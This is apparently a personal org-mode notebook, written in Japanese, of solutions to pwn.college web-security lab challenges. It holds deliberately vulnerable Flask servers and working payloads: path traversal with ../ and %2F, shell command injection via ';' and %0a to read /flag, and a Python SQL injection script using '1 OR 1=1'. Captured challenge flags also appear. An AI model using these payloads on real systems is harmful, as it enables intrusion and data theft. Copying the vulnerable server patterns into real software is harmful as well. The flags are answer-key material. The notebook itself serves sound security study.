#+OPTIONS: d:nil

* TODO Path Traversal 1
#+NAME: server
#+begin_src python
#!/usr/bin/exec-suid -- /usr/bin/python3 -I

import flask
import os

app = flask.Flask(__name__)


@app.route("/package", methods=["GET"])
@app.route("/package/<path:path>", methods=["GET"])
def challenge(path="index.html"):
    requested_path = app.root_path + "/files/" + path
    print(f"DEBUG: {requested_path=}")
    try:
        return open(requested_path).read()
    except PermissionError:
        flask.abort(403, requested_path)
    except FileNotFoundError:
        flask.abort(404, f"No {requested_path} from directory {os.getcwd()}")
    except Exception as e:
        flask.abort(500, requested_path + ":" + str(e))


app.secret_key = os.urandom(8)
app.config["SERVER_NAME"] = f"challenge.localhost:80"
app.run("challenge.localhost", 80)
#+end_src
~--path-as-is~ を付加しないとフラグは得られなかった。curl のバージョンは\(8.17.0\)だった。

#+begin_src shell :eval no
curl --path-as-is http://challenge.localhost/package/../../flag
#+end_src
* DONE Path Traversal 2
CLOSED: [2026-06-09 火 23:32]
:LOGBOOK:
- CLOSING NOTE [2026-06-09 火 23:32] \\
  fortunes を見落していてなかなか解けなかった...

  #+begin_comment
  pwn.college{kKM0dpmyBsNbIWN2_DdICoYE9yq.dJjN1YDL2AjNyMzW}
  #+end_comment

  #+begin_example
  DEBUG: requested_path='/challenge/files/fortunes/../../../flag'
  127.0.0.1 - - [09/Jun/2026 14:31:01] "GET /serve/fortunes/..%2F..%2F..%2Fflag HTTP/1.1" 200 -
  #+end_example
- Note taken on [2026-06-09 火 22:18] \\
  おしい？

  #+begin_example
  127.0.0.1 - - [09/Jun/2026 13:09:55] "GET /serve/..%2f..%2fflag HTTP/1.1" 404 -
  #+end_example
:END:
#+NAME: server
#+begin_src python
#!/usr/bin/exec-suid -- /usr/bin/python3 -I

import flask
import os

app = flask.Flask(__name__)


@app.route("/serve", methods=["GET"])
@app.route("/serve/<path:path>", methods=["GET"])
def challenge(path="index.html"):
    requested_path = app.root_path + "/files/" + path.strip("/.")
    print(f"DEBUG: {requested_path=}")
    try:
        return open(requested_path).read()
    except PermissionError:
        flask.abort(403, requested_path)
    except FileNotFoundError:
        flask.abort(404, f"No {requested_path} from directory {os.getcwd()}")
    except Exception as e:
        flask.abort(500, requested_path + ":" + str(e))


app.secret_key = os.urandom(8)
app.config["SERVER_NAME"] = f"challenge.localhost:80"
app.run("challenge.localhost", 80)
#+end_src

#+begin_src shell
curl "challenge.localhost/serve/fortunes/..%2F..%2F..%2Fflag"
#+end_src
** 参考
1. [[https://blog.hamayanhamayan.com/entry/2021/12/08/220449][CTFのWebセキュリティにおけるPath Traversal, LFI/RFI (File Upload, ZipSlip) - はまやんはまやんはまやん]]
* TODO CMDi 1
:LOGBOOK:
- Note taken on [2026-06-10 水 09:16] \\
  #+begin_comment
  pwn.college{YYdXJaz4HORdyee8PwfGkKYvTQ-.dVjN1YDL2AjNyMzW}
  #+end_comment
:END:
~;~ を先頭に入れると直前のコマンドを終了させて、任意のコードを実行できる。

#+NAME: server
#+begin_src python
#!/usr/bin/exec-suid -- /usr/bin/python3 -I

import subprocess
import flask
import os

app = flask.Flask(__name__)


@app.route("/resource", methods=["GET"])
def challenge():
    arg = flask.request.args.get("dir", "/challenge")
    command = f"ls -l {arg}"

    print(f"DEBUG: {command=}")
    result = subprocess.run(
        command,  # the command to run
        shell=True,  # use the shell to run this command
        stdout=subprocess.PIPE,  # capture the standard output
        stderr=subprocess.STDOUT,  # 2>&1
        encoding="latin",  # capture the resulting output as text
    ).stdout

    return f"""
        <html><body>
        Welcome to the dirlister service! Please choose a directory to list the files of:
        <form action="/resource"><input type=text name=dir><input type=submit value=Submit></form>
        <hr>
        <b>Output of {command}:</b><br>
        <pre>{result}</pre>
        </body></html>
        """


os.setuid(os.geteuid())
os.environ["PATH"] = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
app.secret_key = os.urandom(8)
app.config["SERVER_NAME"] = "challenge.localhost:80"
app.run("challenge.localhost", 80)
#+end_src

スペースを他の文字に置き換える必要がある。

#+begin_src shell
curl "http://challenge.localhost:80/resource?dir=;cat%20/flag"
#+end_src

#+begin_src shell
curl "http://challenge.localhost:80/resource?dir=;cat</flag"
#+end_src
* TODO CMDi 2

#+begin_src shell
curl "http://challenge.localhost/event?top-path=%0acat</flag"
#+end_src
* CMDi 3
~ls -l~ には、 ~''~ があるので、なにかしらの引数を与えないとエラーになる。
そこで、現在のディレクトリを表す ~.~ などを指定して、いったん ~'~ で閉じる。
今回は ~;~ の使用は制限されていないので、その後に続けて、フラグを覗くコマンドを与える。
なお、最後の ~'~ を閉じる必要があるので、忘れずに行う。

#+begin_src shell
curl "http://challenge.localhost/test?filedir=.';cat</flag'"
#+end_src
* CMDi 4
最後の ~;~ を忘れずに。

#+begin_src shell
curl "http://challenge.localhost/event?time-zon=;cat</flag;"
#+end_src
* CMDi 5
これでいいのか？

#+begin_src shell
curl "http://challenge.localhost/activity?file-loc=empty.txt;cat%20/flag%20>%20flag";cat flag
#+end_src

* CMDi 6
だいたいの文字が弾かれるようになっているので、改行で区切る。

#+begin_src shell
curl "http://challenge.localhost/goal?subdirectory=%0acat%20/flag"
#+end_src
* TODO Authentication Bypass 1
* TODO Authentication Bypass 2
* SQLi 1
とりあえず python でスクリプトを組んだ。

#+begin_src python :eval no
#!/usr/bin/env python

import requests

url = "http://challenge.localhost/authenticate"

session = requests.Session()

payload = {
    "identity": "admin",
    "pin": "1 OR 1=1"
}

try:
    response = session.post(url, data=payload)
    print(response.text)
except:
    print("Error")
#+end_src

#+begin_src shell
python exploit.py | grep 'flag'
#+end_src

（実行はリモートサーバー上で）
